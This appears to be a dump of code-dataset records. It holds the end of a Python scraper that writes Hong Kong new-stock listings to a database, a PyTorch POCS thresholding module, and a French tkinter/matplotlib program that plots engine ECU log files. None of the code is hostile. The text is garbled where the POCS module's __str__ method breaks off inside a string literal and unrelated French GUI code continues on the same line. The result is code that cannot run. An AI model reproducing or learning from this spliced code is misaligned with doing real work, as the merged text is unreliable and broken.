self.convert_float(item_list[6].xpath('.//text()').extract_first())\n over_price_part = item_list[7].xpath('.//text()').extract_first()\n hit_least_num = self.convert_hand_int(item_list[8].xpath('.//text()').extract_first())\n hit_ratio = self.convert_float(item_list[9].xpath('.//text()').extract_first())\n current_price = self.convert_float(item_list[10].xpath('.//text()').extract_first())\n first_day_raise = self.convert_float(item_list[11].xpath('.//text()').extract_first())\n accumulate_raise = self.convert_float(item_list[12].xpath('.//text()').extract_first())\n now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n if margin_price == 'N/A':\n # 上市失败的\n continue\n try:\n self.cursor.execute(insert_sql, (\n name, code, issue_date, each_hand_stock, share_value_Yi, margin_price, price, over_price_part,\n hit_least_num, hit_ratio, current_price, first_day_raise, accumulate_raise, now, now))\n except Exception as e:\n print(e)\n self.conn.rollback()\n else:\n self.conn.commit()\n\n def run(self):\n total_page = 25\n self.create_table()\n gen = self.fetch(total_page)\n page = 0\n for content in gen:\n print('page ', page)\n self.parse(content)\n page += 1\n self.conn.close()\n\n def clear_data(self):\n 'select code from tb_hk_new_stock group by code having count(*) as n >1'\n pass\n\n\ndef main():\n app = AAStockNewStock()\n app.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Rockyzsu/stock","sub_path":"hk_stock/aastock_new_stock.py","file_name":"aastock_new_stock.py","file_ext":"py","file_size_in_byte":6427,"program_lang":"python","lang":"en","doc_type":"code","stars":4515,"dataset":"github-code","pt":"53"} +{"seq_id":"10056090193","text":"import torch\nimport numpy as np\n\n\ndef threshold(in_content: torch.Tensor or np.ndarray, thresh: float = None) -> torch.Tensor or np.ndarray:\n if thresh is None:\n thresh = compute_threshold(in_content)\n\n if isinstance(in_content, torch.Tensor):\n p = (in_content > thresh).float()\n m = (in_content < -thresh).float()\n else:\n p = (in_content > thresh).astype(np.float)\n m = (in_content < -thresh).astype(np.float)\n return in_content * (p + m)\n\n\ndef compute_threshold(in_content: torch.Tensor or np.ndarray, perc: float = 10):\n return float(in_content.max() * perc/100)\n\n\ndef pocs_fk_fn(out: torch.Tensor or np.ndarray,\n data: torch.Tensor or np.ndarray,\n mask: torch.Tensor or np.ndarray,\n th: float, alp: float = 0.2) -> torch.Tensor or np.ndarray:\n assert type(out) == type(data) == type(mask)\n \n if isinstance(out, torch.Tensor):\n dim = out.ndim - 2\n _ = torch.rfft(out, dim, onesided=False)\n _ = threshold(_, th)\n _ = torch.irfft(_, dim, onesided=False)\n else:\n _ = np.fft.rfftn(out)\n _ = threshold(_, th)\n _ = np.fft.irfftn(_)\n \n pocs = _ * (1 - alp * mask)\n res = alp * data + pocs\n \n return res\n\n\nclass POCS(torch.nn.Module):\n \"\"\"\n Base implementation of POCS method.\n Arguments:\n data: tensor of data\n mask: binary tensor of mask\n weight: weighting factor between the true data and the POCS one\n forward_fn: transform forward function (from tensor to tensor)\n adjoint_fn: transform adjoint (or inverse) function (from tensor to tensor)\n thresh_perc: percentile for computing the threshold\n \"\"\"\n \n def __init__(self, data: torch.Tensor, mask: torch.Tensor, weight: float,\n forward_fn: callable, adjoint_fn: callable, thresh_perc: float = None):\n super(POCS, self).__init__()\n self.weighted_data = weight * data\n self.weighted_mask = torch.ones_like(mask) - weight * mask\n self.weight = 
weight\n self.forward_fn = forward_fn\n self.adjoint_fn = adjoint_fn\n self.thresh_perc = thresh_perc\n \n def __repr__(self):\n return self.__str__()\n \n def __str__(self):\n fn = str(self.forward_fn).replace(' pour récupérer la valeur associée au bouton\r\n \r\ndef choixcourbes(): #fenêtre de choix des courbes à afficher lorsque l'on est en mode dépannage\r\n a=1\r\n b=40\r\n global wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3 #1 si case cochée, zéro sinon\r\n top = tkinter.Tk() #top est le nom de la fenêtre\r\n top.title('Choix des courbes')\r\n OK=Button(top, text='OK', command=top.destroy)\r\n OK.pack(side=BOTTOM)\r\n # l = LabelFrame(fenetre, text=\"Titre de la frame\", padx=20, pady=20)\r\n Frame5 = LabelFrame(top,text=\"Autres paramètres\",borderwidth=2,relief=GROOVE)\r\n Frame5.pack(side=BOTTOM,padx=10,pady=10)\r\n Frame3b = Frame(top,borderwidth=0)#,relief=GROOVE)\r\n Frame3b.pack(side=BOTTOM,padx=10,pady=10)\r\n Frame4 = LabelFrame(Frame3b,text=\"Pression carburant\",borderwidth=2,relief=GROOVE)\r\n Frame4.pack(side=RIGHT,padx=10,pady=10)\r\n Frame3 = LabelFrame(Frame3b,text=\"Hélice\",borderwidth=2,relief=GROOVE)\r\n Frame3.pack(side=LEFT,padx=10,pady=10)\r\n Frame2 = LabelFrame(top,text=\"Moteur\",borderwidth=2,relief=GROOVE)\r\n Frame2.pack(side=RIGHT,padx=10,pady=10)\r\n Frame1 = LabelFrame(top,text=\"Admission\",borderwidth=2,relief=GROOVE)\r\n Frame1.pack(padx=10,pady=10)\r\n CheckVar1 = IntVar()\r\n CheckVar2 = IntVar()\r\n CheckVar3 = IntVar()\r\n CheckVar4 = IntVar()\r\n CheckVar5 = IntVar()\r\n CheckVar6 = IntVar()\r\n CheckVar7 = IntVar()\r\n CheckVar8 = IntVar()\r\n CheckVar9 = IntVar()\r\n CheckVar10 = IntVar()\r\n CheckVar11 = IntVar()\r\n CheckVar12 = IntVar()\r\n CheckVar13 = IntVar()\r\n CheckVar14 = IntVar()\r\n CheckVar15 = IntVar()\r\n CheckVar16 = IntVar()\r\n CheckVar17 = IntVar()\r\n CheckVar18 = IntVar()\r\n CheckVar19 = IntVar()\r\n CheckVar20 = IntVar()\r\n CheckVar21 = IntVar()\r\n CheckVar22 = IntVar()\r\n C1 = Checkbutton(Frame1, text = \"WG_DC-A190\", variable = CheckVar1, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C2 = Checkbutton(Frame2, text = \"DisLoad-A334\", variable = CheckVar2, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C3 = Checkbutton(Frame3, text = \"Prop RPM-A306\", variable = CheckVar3, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C4 = Checkbutton(Frame3, text = \"Prop-DC-A313\", variable = CheckVar4, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C5 = Checkbutton(Frame3, text = \"PrSpdTar-A308\", variable = CheckVar5, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C6 = Checkbutton(Frame1, text = \"MAPTar-A181\", variable = CheckVar6, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C7 = Checkbutton(Frame4, text = \"PRail_DC-A204\", variable = CheckVar7, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C8 = Checkbutton(Frame4, text = \"PRaTar-A192\", variable = CheckVar8, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C9 = Checkbutton(Frame4, text = \"PRail-A131\", variable = CheckVar9, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C10 = Checkbutton(Frame1, text = \"MAP-A88\", variable = CheckVar10, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C11 = Checkbutton(Frame2, text = \"Engine Revs. 
RPM-A47\", variable = CheckVar11, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C12 = Checkbutton(Frame5, text = \"VBatt-A91\", variable = CheckVar12, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C13 = Checkbutton(Frame5, text = \"TAir-A93\", variable = CheckVar13, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C14 = Checkbutton(Frame5, text = \"TH2O-A92\", variable = CheckVar14, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C15 = Checkbutton(Frame5, text = \"TOil-A94\", variable = CheckVar15, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C16 = Checkbutton(Frame5, text = \"POil-A97\", variable = CheckVar16, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C17 = Checkbutton(Frame5, text = \"TGear-A267\", variable = CheckVar17, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C18 = Checkbutton(Frame5, text = \"PBaro-A99\", variable = CheckVar18, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C19 = Checkbutton(Frame5, text = \"TECU-A96\", variable = CheckVar19, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C20 = Checkbutton(Frame4, text = \"FCh-A246\", variable = CheckVar20, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C21 = Checkbutton(Frame2, text = \"Load-A87\", variable = CheckVar21, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C22 = Checkbutton(Frame5, text = \"Altitude\", variable = CheckVar22, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n \r\n C1.pack();C6.pack();C10.pack();\r\n C2.pack();C11.pack();C21.pack();\r\n C3.pack();C4.pack();C5.pack();\r\n C7.pack();C8.pack();C9.pack();C20.pack();\r\n C13.pack();C14.pack();C15.pack();C17.pack();C19.pack();C16.pack();C18.pack();C22.pack();C12.pack();\r\n \r\n \r\n top.mainloop()\r\n e=(CheckVar1.get(),CheckVar2.get(),CheckVar3.get(),CheckVar4.get(),CheckVar5.get(),CheckVar6.get(),CheckVar7.get(),CheckVar8.get(),CheckVar9.get(),CheckVar10.get(),CheckVar11.get(),CheckVar12.get(),CheckVar13.get(),CheckVar14.get(),CheckVar15.get(),CheckVar16.get(),CheckVar17.get(),CheckVar18.get(),CheckVar19.get(),CheckVar20.get(),CheckVar21.get(),CheckVar22.get())\r\n (wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3)=e\r\n\r\ndef ecu(): #fenêtre du choix des ECU\r\n largeur=30\r\n global ecu1\r\n fenetre=Tk() #boutons radio (un seul peut être coché à la fois)\r\n fenetre.title(\"Choix de l'ECU\")\r\n var = StringVar()\r\n ecua = Radiobutton(fenetre, text=\"ECU A\", variable=var, value=0, width=largeur)\r\n ecub = Radiobutton(fenetre, text=\"ECU B\", variable=var, value=1,width=largeur)\r\n OK=Button(fenetre, text='OK', command=fenetre.destroy)\r\n ecua.pack()\r\n ecub.pack()\r\n OK.pack()\r\n ecua.select() #par défaut A est sélectionné\r\n mainloop()\r\n ecu1=var.get() #-> pour récupérer la valeur associée au bouton\r\n\r\ndef click(): #fonction exécutée une fois l'explorateur de fichier fermé\r\n global chemin\r\n user = getpass.getuser()\r\n file = tkinter.filedialog.askopenfilename(filetypes=[('text files', '.csv')],initialdir='C:/Users/%s' % user)\r\n directory = os.path.split(file)\r\n # print(directory)\r\n chemin=directory\r\n \r\ndef explo(): #lance l'explorateur de fichiers et stock l'adresse du fichier dans variable globale\r\n global gui\r\n gui = tkinter.Tk()\r\n user = getpass.getuser()\r\n button = tkinter.Button(gui, 
command=click())\r\n button.grid()\r\n gui.destroy()\r\n gui.mainloop()\r\n \r\ndef f(): #fermeture de la fenêtre et mode recommencer activé\r\n global recommencer\r\n recommencer=1\r\n fenetre2.destroy()\r\n \r\ndef apropos():\r\n about=\"Copyright (c) 2016, Loïc BRUNEAU\\nAll rights reserved.\\n\"\r\n about+=\"Logiciel sous licence BSD\\n\\n\"\r\n about+=\"Contact: loic.ds1@hotmail.fr\\n\\n\"\r\n about+=\"Développé à l'ENAC Melun\"\r\n fenetre2.destroy()\r\n fenetre3=Tk() #boutons radio (un seul peut être coché à la fois)\r\n fenetre3.title(\"À propos\")\r\n Label(fenetre3, text=about).pack()\r\n mainloop()\r\n \r\ndef rtlf():\r\n global maintenance\r\n global recommencer\r\n global fenetre2\r\n global gui\r\n tableau=[] #tableau des données qu'on affichera ensuite\r\n global wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3\r\n global chemin\r\n global ecu1\r\n \r\n explo()\r\n chemin=chemin[0]+'/'+chemin[1] #l'adresse exacte du fichier avec le nom du fichier\r\n # fic=open('C:/Users/Loïc/Desktop/delog/RTLF#02-02-03295#0702#160208#093347.csv',\"r\")\r\n fic=open(chemin,\"r\")\r\n\r\n maint()\r\n \r\n n=0\r\n for line in fic: #pour compter le nombre de lignes dans le fichier\r\n n+=1\r\n fic.close()\r\n # n=str(n-1)\r\n # afficher=\"fichier de \"+n+\" secondes\" #nombre de secondes dans le fichier pour choisir la plage horaire\r\n # print(afficher)\r\n # fenetre=Tk() #afficher le texte dans une fenêtre #à voir si c'est utile dans le cas où compilé en .exe\r\n # champ_label = Label(fenetre, text=afficher)\r\n # debut=StringVar()\r\n # fin=StringVar()\r\n # ligne_texte = Entry(fenetre, textvariable=var_texte, width=30)\r\n # ligne_texte.pack()\r\n # champ_label.pack()\r\n # mainloop()\r\n # try:\r\n # debut=int(input(\"Temps de départ :\"))\r\n # except BaseException:\r\n # debut=0\r\n # try:\r\n # fin=int(input(\"Temps de fin :\"))\r\n # except BaseException:\r\n # fin=int(n)\r\n # if fin>int(n) or debut<0 or fin-debut<1: #pour afficher quelque chose quoi qu'on rentre comme valeur ou chaine de caractère\r\n # debut=0\r\n # fin=int(n)\r\n # debut=int(debut)\r\n # fic=open(\"C:/Users/Loïc/Desktop/delog/RTLF#02-02-03295#0702#160208#093347.csv\",\"r\")\r\n #penser à supprimer les '' de chaque str pour un meilleur affichage\r\n \r\n recommencer=1\r\n \r\n while str(recommencer)=='1':\r\n moteur=chemin[-28:-23] #numéro de série du moteur\r\n nbheures=chemin[-22:-18] #nombre d'heures de vol\r\n titre=\"Moteur \"+moteur+\" \"+nbheures+\"h\"\r\n \r\n \r\n fic=open(chemin,\"r\")\r\n t=fic.readline()\r\n t=t.split(\",\") \r\n\r\n ecu()\r\n \r\n try:\r\n if int(ecu1)==1: #ECU B sélectionnée\r\n iwg=t.index('WG_DC-B190')\r\n idisload=t.index('DisLoad-B334') #c'est ici qu'il faut modifier les chaines de caractère si à l'avenir les NOMS des colonnes changent\r\n iproprpm=t.index('Prop RPM-B306') #il faudrait alors efectuer ce changement à trois endroits: ici puis à deux reprises dans la fonction rtlf2()\r\n ipropdc=t.index('Prop-DC-B313')\r\n iprspd=t.index('PrSpdTar-B308')\r\n imaptar=t.index('MAPTar-B181')\r\n ipraildc=t.index('PRail_DC-B204')\r\n ipratar=t.index('PRaTar-B192')\r\n iprail=t.index('PRail-B131')\r\n imap=t.index('MAP-B88')\r\n iengine=t.index('Engine Revs. 
RPM-B47')\r\n ivbatt=t.index('VBatt-B91')\r\n itair=t.index('TAir-B93')\r\n ith2o=t.index('TH2O-B92')\r\n itoil=t.index('TOil-B94')\r\n ipoil=t.index('POil-B97')\r\n itgear=t.index('TGear-B267')\r\n ipbaro=t.index('PBaro-B99')\r\n itecu=t.index('TECU-B96')\r\n ifch=t.index('FCh-B246')\r\n iload=t.index('Load-B87')\r\n iecuact=t.index('ECU Act-B257') \r\n else: #ECU A sélectionée\r\n iwg=t.index('WG_DC-A190')\r\n idisload=t.index('DisLoad-A334')\r\n iproprpm=t.index('Prop RPM-A306')\r\n ipropdc=t.index('Prop-DC-A313')\r\n iprspd=t.index('PrSpdTar-A308')\r\n imaptar=t.index('MAPTar-A181')\r\n ipraildc=t.index('PRail_DC-A204')\r\n ipratar=t.index('PRaTar-A192')\r\n iprail=t.index('PRail-A131')\r\n imap=t.index('MAP-A88')\r\n iengine=t.index('Engine Revs. RPM-A47')\r\n ivbatt=t.index('VBatt-A91')\r\n itair=t.index('TAir-A93')\r\n ith2o=t.index('TH2O-A92')\r\n itoil=t.index('TOil-A94')\r\n ipoil=t.index('POil-A97')\r\n itgear=t.index('TGear-A267')\r\n ipbaro=t.index('PBaro-A99')\r\n itecu=t.index('TECU-A96')\r\n ifch=t.index('FCh-A246')\r\n iload=t.index('Load-A87')\r\n iecuact=t.index('ECU Act-A257')\r\n \r\n wg=[]\r\n disload=[]\r\n proprpm=[]\r\n propdc=[]\r\n prspd=[]\r\n maptar=[]\r\n praildc=[]\r\n pratar=[]\r\n prail=[]\r\n map=[]\r\n engine=[]\r\n vbatt=[]\r\n tair=[]\r\n th2o=[]\r\n toil=[]\r\n poil=[]\r\n tgear=[]\r\n pbaro=[]\r\n tecu=[]\r\n fch=[]\r\n load=[]\r\n alti=[]\r\n temps=[]\r\n ecuact=[]\r\n drail=[]\r\n dprop=[]\r\n dmap=[]\r\n \r\n # for i in range(debut):\r\n # fic.readline()\r\n for i in range(n-1):#debut,fin):\r\n s=fic.readline()\r\n s=s.split(\",\")\r\n # WG 93-35 58\r\n # diload 84-48 36\r\n # prop rpm 95-37 58\r\n # prspd=pratar=wg=maptar=prail=praildc 58\r\n # load 68-16 52\r\n # poil=toil=th2o=tgear 76-24 52\r\n # engine 57-5 52\r\n # map 70-18 52\r\n # propdc 97-39 58\r\n # tair 71-19 52\r\n # vbatt 69-17 52\r\n # pbaro=tecu 78-26 52\r\n # fch 83-32 51\r\n temps.append(i)\r\n wg.append(round(float(s[iwg]),2)) \r\n disload.append(round(float(s[idisload]),1)) \r\n proprpm.append(round(float(s[iproprpm]),2)) #Finalement niveau durée d'exécution c'est équivalent, autant garder ça\r\n propdc.append(round(float(s[ipropdc]),2))\r\n prspd.append(int(float(s[iprspd])))\r\n maptar.append(int(float(s[imaptar])))\r\n praildc.append(int(float(s[ipraildc])))\r\n pratar.append(int(float(s[ipratar])))\r\n prail.append(round(float(s[iprail]),1))\r\n map.append(int(float(s[imap])))\r\n engine.append(int(float(s[iengine])))\r\n vbatt.append(round(float(s[ivbatt]),1))\r\n tair.append(round(float(s[itair]),2))\r\n th2o.append(int(float(s[ith2o])))\r\n toil.append(int(float(s[itoil])))\r\n poil.append(round(float(s[ipoil]),1))\r\n tgear.append(int(float(s[itgear])))\r\n pbaro.append(int(float(s[ipbaro])))\r\n tecu.append(int(float(s[itecu])))\r\n fch.append(round(float(s[ifch]),2))\r\n load.append(round(float(s[iload]),1))\r\n alti.append(int(float(-(np.exp((np.log(abs(pbaro[-1]))-np.log(1013.25))/5.255)-1)*(288.15/0.0065)*3.5)))\r\n ecuact.append(190*float(s[iecuact]))\r\n drail.append(pratar[-1]-prail[-1])\r\n dprop.append(prspd[-1]-proprpm[-1])\r\n dmap.append(maptar[-1]-map[-1])\r\n # if (abs(alti[-1]-alti[-2])>1000 and i>debut+5): #pour éviter les valeurs incohérentes\r\n # alti[-1]=alti[-2] #ne fonctionne pas, on s'en passera pour le moment\r\n if prspd[-1]==-1: #permet de retirer les lignes où tout est égal à -1, les courbes sont vachement mieux et problème de l'alti réglée?\r\n for i in 
[temps,wg,disload,proprpm,propdc,prspd,maptar,praildc,pratar,prail,map,engine,vbatt,tair,th2o,toil,poil,tgear,pbaro,tecu,fch,load,alti,ecuact,drail,dprop,dmap]:\r\n del i[-1]\r\n \r\n fic.close()\r\n \r\n if int(maintenance)==1:\r\n choixcourbes()\r\n else:\r\n (wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3)=(1,0,1,0,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0)\r\n \r\n niveau=min(alti)\r\n for i in range(len(alti)): #pour affiner la valeur de l'altitude, on considère 0m-> plus basse pression\r\n alti[i]=alti[i]-niveau\r\n k=(wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3)\r\n fig=plt.figure(figsize=(40,20))\r\n # ax = fig.add_subplot(111, axisbg='#FFFFFF') #si on veut rajouter des barres horizontales et verticales autour du curseur, +voir ligne curseur\r\n tableau=[]\r\n tableau.append(temps) #tableau des valeurs qu'on va afficher après\r\n courbes=['Temps']\r\n if k[0]:\r\n plt.plot(temps,wg,label='Waste Gate')\r\n tableau.append(wg)\r\n courbes.append('Waste Gate') #titre à afficher pour le tableau de valeurs\r\n if k[5]:\r\n plt.plot(temps,maptar,label='Map Tar')\r\n tableau.append(maptar)\r\n courbes.append('Map Tar')\r\n if k[9]:\r\n plt.plot(temps,map,label='MAP')\r\n tableau.append(map)\r\n courbes.append('MAP')\r\n if int(maintenance)==0:\r\n tableau.append(dmap)\r\n courbes.append('Écart MAP')\r\n if k[1]:\r\n plt.plot(temps,disload,label='DisLoad')\r\n tableau.append(disload)\r\n courbes.append('DisLoad')\r\n if k[10]:\r\n plt.plot(temps,engine,label='Engine Revs. RPM-A47')\r\n tableau.append(engine)\r\n courbes.append('Engine Revs. RPM-A47')\r\n if k[20]:\r\n plt.plot(temps,load,label='Load-A87')\r\n tableau.append(load)\r\n courbes.append('Load-A87')\r\n if k[4]:\r\n plt.plot(temps,prspd,label='Prop Speed')\r\n tableau.append(prspd)\r\n courbes.append('Prop Speed')\r\n if k[2]:\r\n plt.plot(temps,proprpm,label='Prop RPM')\r\n tableau.append(proprpm)\r\n courbes.append('Prop RPM')\r\n if int(maintenance)==0:\r\n tableau.append(dprop)\r\n courbes.append('Écart PROP')\r\n if k[3]:\r\n plt.plot(temps,propdc,label='Prop DC')\r\n tableau.append(propdc)\r\n courbes.append('Prop DC')\r\n if k[6]:\r\n plt.plot(temps,praildc,label='Prail DC')\r\n tableau.append(praildc)\r\n courbes.append('Prail DC')\r\n if k[7]:\r\n plt.plot(temps,pratar,label='PraTar')\r\n tableau.append(pratar)\r\n courbes.append('PraTar')\r\n if k[8]:\r\n plt.plot(temps,prail,label='Prail')\r\n tableau.append(prail)\r\n courbes.append('Prail')\r\n if int(maintenance)==0:\r\n tableau.append(drail)\r\n courbes.append('Écart Rail')\r\n if k[19]:\r\n plt.plot(temps,fch,label='FCh-A246')\r\n tableau.append(fch)\r\n courbes.append('FCh-A246')\r\n if k[12]:\r\n plt.plot(temps,tair,label='TAir-A93')\r\n tableau.append(tair)\r\n courbes.append('TAir-A93')\r\n if k[13]:\r\n plt.plot(temps,th2o,label='TH2O-A92')\r\n tableau.append(th2o)\r\n courbes.append('TH2O-A92')\r\n if k[14]:\r\n plt.plot(temps,toil,label='TOil-A94')\r\n tableau.append(toil)\r\n courbes.append('TOil-A94')\r\n if k[16]:\r\n plt.plot(temps,tgear,label='TGear-A267')\r\n tableau.append(tgear)\r\n courbes.append('TGear-A267')\r\n if k[18]:\r\n plt.plot(temps,tecu,label='TECU-A96')\r\n tableau.append(tecu)\r\n courbes.append('TECU-A96')\r\n if k[15]:\r\n plt.plot(temps,poil,label='POil-A97')\r\n tableau.append(poil)\r\n courbes.append('POil-A97')\r\n if k[17]:\r\n 
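# Editor's note: the 'Altitude' curve plotted further below is derived from this PBaro channel via the inverted ISA barometric formula h = (T0/L)*(1 - (p/p0)^(1/5.255)), with T0/L = 288.15/0.0065 and p0 = 1013.25 hPa; the trailing factor 3.5 in the alti computation above appears to be an approximate metres-to-feet conversion (3.2808 would be exact).\r\n                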
plt.plot(temps,pbaro,label='PBaro-A99')\r\n tableau.append(pbaro)\r\n courbes.append('PBaro-A99')\r\n if k[21]:\r\n plt.plot(temps,alti,label=\"Allure de l'altitude\")\r\n tableau.append(alti)\r\n courbes.append(\"Altitude\")\r\n if k[11]:\r\n plt.plot(temps,vbatt,label='VBatt-A91')\r\n tableau.append(vbatt)\r\n courbes.append('VBatt-A91')\r\n plt.plot(temps,ecuact,'#798081',label=t[iecuact]) #hexa du gris, courbe pour voir si l'ECU selectionnée est active\r\n plt.legend()\r\n if ecu1=='0':\r\n titre+=' ECU A'\r\n else:\r\n titre+=' ECU B'\r\n plt.title(titre) #immat du moteur+nombre d'heures de vol\r\n plt.show()\r\n l=''\r\n for i in courbes:\r\n c=len(i)\r\n c-=11\r\n c=-c\r\n c=c*' '\r\n l+=i+c\r\n # ppp=l+'\\n'\r\n ppp=''\r\n temp=''\r\n for j in range(len(tableau[0])):\r\n temp=' '\r\n for i in range(len(tableau)):\r\n b=len(str(tableau[i][j]))\r\n b-=11\r\n b=-b\r\n b=b*' '\r\n temp=temp+str(tableau[i][j])+b\r\n # print(str(temp)[1:-1])\r\n temp+='\\n'\r\n ppp+=temp\r\n # print(ppp)\r\n root = Tk()\r\n root.title('Tableau de valeurs')\r\n Frame6 = Frame(root,borderwidth=0)#,relief=GROOVE)\r\n Frame6.pack(side=TOP,padx=10,pady=10)\r\n U=Text(Frame6, height=0, width=13*len(courbes))\r\n U.pack()\r\n U.insert(END,l)\r\n T = Text(root, height=400, width=13*len(courbes))\r\n T.pack()\r\n T.insert(END, ppp)\r\n mainloop()\r\n \r\n # print(courbes)\r\n # for i in range (len(tableau)):\r\n # print(tableau[i])\r\n except BaseException:\r\n print('Le fichier est corrompu, il faut effectuer de nouvelles mesures')\r\n recommencer=0\r\n # recommencer=input(\"Recommencer? 1 si oui :\")\r\n global fenetre2\r\n fenetre2=Tk() #boutons radio (un seul peut être coché à la fois)\r\n fenetre2.title(\"\")\r\n quitt=Button(fenetre2, text=\"Quitter\", command=fenetre2.destroy)\r\n reco=Button(fenetre2, text='Recommencer', command=f)\r\n propos=Button(fenetre2, text='À propos',command=apropos)\r\n reco.pack()\r\n propos.pack()\r\n quitt.pack()\r\n mainloop()\r\n \r\n\r\n\r\ndef rtlf2():\r\n again=0\r\n global courbes,l\r\n global maintenance\r\n global recommencer\r\n global fenetre2\r\n global gui\r\n tableau=[] #tableau des données qu'on affichera ensuite\r\n global wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3\r\n global chemin\r\n global ecu1\r\n \r\n explo()\r\n chemin2=chemin\r\n chemin2=chemin2[0]+'/'+chemin2[1] #l'adresse exacte du fichier avec le nom du fichier\r\n # fic=open('C:/Users/Loïc/Desktop/delog/RTLF#02-02-03295#0702#160208#093347.csv',\"r\")\r\n \r\n recommencer=1\r\n \r\n while str(recommencer)=='1':\r\n \r\n fic=open(chemin2,\"r\")\r\n \r\n \r\n if again==0:\r\n maint()\r\n \r\n n=0\r\n for line in fic: #pour compter le nombre de lignes dans le fichier\r\n n+=1\r\n fic.close()\r\n \r\n \r\n \r\n \r\n moteur=chemin2[-28:-23] #numéro de série du moteur\r\n nbheures=chemin2[-22:-18] #nombre d'heures de vol\r\n titre=\"Moteur \"+moteur+\" \"+nbheures+\"h\"\r\n \r\n \r\n fic=open(chemin2,\"r\")\r\n t=fic.readline()\r\n t=t.split(\",\") \r\n \r\n \r\n\r\n ecu()\r\n \r\n ecu0=ecu1\r\n \r\n try:\r\n if int(ecu1)==1: #ECU B sélectionnée\r\n iwg=t.index('WG_DC-B190')\r\n idisload=t.index('DisLoad-B334')\r\n iproprpm=t.index('Prop RPM-B306')\r\n ipropdc=t.index('Prop-DC-B313')\r\n iprspd=t.index('PrSpdTar-B308')\r\n imaptar=t.index('MAPTar-B181')\r\n ipraildc=t.index('PRail_DC-B204')\r\n ipratar=t.index('PRaTar-B192')\r\n iprail=t.index('PRail-B131')\r\n imap=t.index('MAP-B88')\r\n 
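# Editor's note: these hard-coded header lookups are the single maintenance point if the CSV column names ever change. A more compact, equivalent sketch (assuming header names are unique) would be: idx = {name: pos for pos, name in enumerate(t)}, then iwg = idx['WG_DC-B190'] and so on.\r\n                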
iengine=t.index('Engine Revs. RPM-B47')\r\n ivbatt=t.index('VBatt-B91')\r\n itair=t.index('TAir-B93')\r\n ith2o=t.index('TH2O-B92')\r\n itoil=t.index('TOil-B94')\r\n ipoil=t.index('POil-B97')\r\n itgear=t.index('TGear-B267')\r\n ipbaro=t.index('PBaro-B99')\r\n itecu=t.index('TECU-B96')\r\n ifch=t.index('FCh-B246')\r\n iload=t.index('Load-B87')\r\n iecuact=t.index('ECU Act-B257') \r\n else: #ECU A sélectionée\r\n iwg=t.index('WG_DC-A190')\r\n idisload=t.index('DisLoad-A334')\r\n iproprpm=t.index('Prop RPM-A306')\r\n ipropdc=t.index('Prop-DC-A313')\r\n iprspd=t.index('PrSpdTar-A308')\r\n imaptar=t.index('MAPTar-A181')\r\n ipraildc=t.index('PRail_DC-A204')\r\n ipratar=t.index('PRaTar-A192')\r\n iprail=t.index('PRail-A131')\r\n imap=t.index('MAP-A88')\r\n iengine=t.index('Engine Revs. RPM-A47')\r\n ivbatt=t.index('VBatt-A91')\r\n itair=t.index('TAir-A93')\r\n ith2o=t.index('TH2O-A92')\r\n itoil=t.index('TOil-A94')\r\n ipoil=t.index('POil-A97')\r\n itgear=t.index('TGear-A267')\r\n ipbaro=t.index('PBaro-A99')\r\n itecu=t.index('TECU-A96')\r\n ifch=t.index('FCh-A246')\r\n iload=t.index('Load-A87')\r\n iecuact=t.index('ECU Act-A257')\r\n \r\n wg=[]\r\n disload=[]\r\n proprpm=[]\r\n propdc=[]\r\n prspd=[]\r\n maptar=[]\r\n praildc=[]\r\n pratar=[]\r\n prail=[]\r\n map=[]\r\n engine=[]\r\n vbatt=[]\r\n tair=[]\r\n th2o=[]\r\n toil=[]\r\n poil=[]\r\n tgear=[]\r\n pbaro=[]\r\n tecu=[]\r\n fch=[]\r\n 